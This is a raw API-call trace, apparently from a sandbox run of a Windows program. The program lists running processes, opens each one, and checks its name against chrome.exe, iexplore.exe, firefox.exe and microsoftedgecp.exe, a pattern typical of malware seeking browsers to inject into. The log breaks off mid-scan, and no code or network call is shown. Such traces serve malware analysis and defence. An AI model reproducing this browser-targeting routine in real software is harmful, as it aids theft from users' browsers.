	[0195.174] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xe68
	[0195.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.174] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.175] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.175] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.176] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.176] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xe6c
	[0195.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.177] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.177] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.177] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.178] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.178] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.179] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xe70
	[0195.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.179] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.179] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.179] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.180] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.180] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xe74
	[0195.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.181] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.181] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.181] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.182] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.182] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0195.182] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xe78
	[0195.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.183] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0195.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.183] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.183] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0195.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.184] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.184] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.184] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xe7c
	[0195.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.185] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.185] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.185] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.186] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.186] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0195.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xe80
	[0195.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.187] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.187] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.187] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.241] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.241] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0195.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xe84
	[0195.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.242] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0195.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.243] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.243] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0195.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.244] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.244] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xe88
	[0195.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.246] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.246] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.247] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.247] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.248] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0195.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xe8c
	[0195.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.249] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0195.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.249] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.250] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0195.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.250] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.251] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0195.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xe90
	[0195.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.252] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0195.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.253] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.253] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0195.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.254] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.254] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0195.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xe94
	[0195.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.255] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0195.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.255] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.255] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0195.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.255] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.255] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0195.256] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xe98
	[0195.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.256] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0195.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.256] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.257] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0195.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.257] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.257] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0195.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0195.259] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0195.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xe9c
	[0195.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.260] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0195.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.261] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.262] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0195.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.263] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.264] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0195.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xea0
	[0195.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.266] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0195.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.266] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.266] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0195.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.267] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.267] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0195.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xea4
	[0195.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.268] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0195.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.268] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.268] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0195.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.269] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.269] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0195.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xea8
	[0195.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.270] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0195.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.270] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.270] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0195.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.271] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.271] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0195.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xeac
	[0195.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.272] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0195.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.272] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.273] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0195.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.273] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.274] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0195.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xeb0
	[0195.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.274] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0195.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.275] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.275] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0195.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.275] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.275] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0195.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xeb4
	[0195.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.276] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0195.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.277] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.277] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0195.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.278] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.278] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0195.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xeb8
	[0195.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.279] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0195.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.280] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.281] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0195.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.281] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.322] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0195.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xebc
	[0195.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.323] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0195.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.323] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.324] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0195.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.324] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.324] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0195.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xec0
	[0195.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.325] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0195.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.325] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.326] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0195.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.326] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.326] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0195.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xec4
	[0195.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.327] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0195.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.328] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.328] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0195.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.329] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.329] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0195.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xec8
	[0195.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.330] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
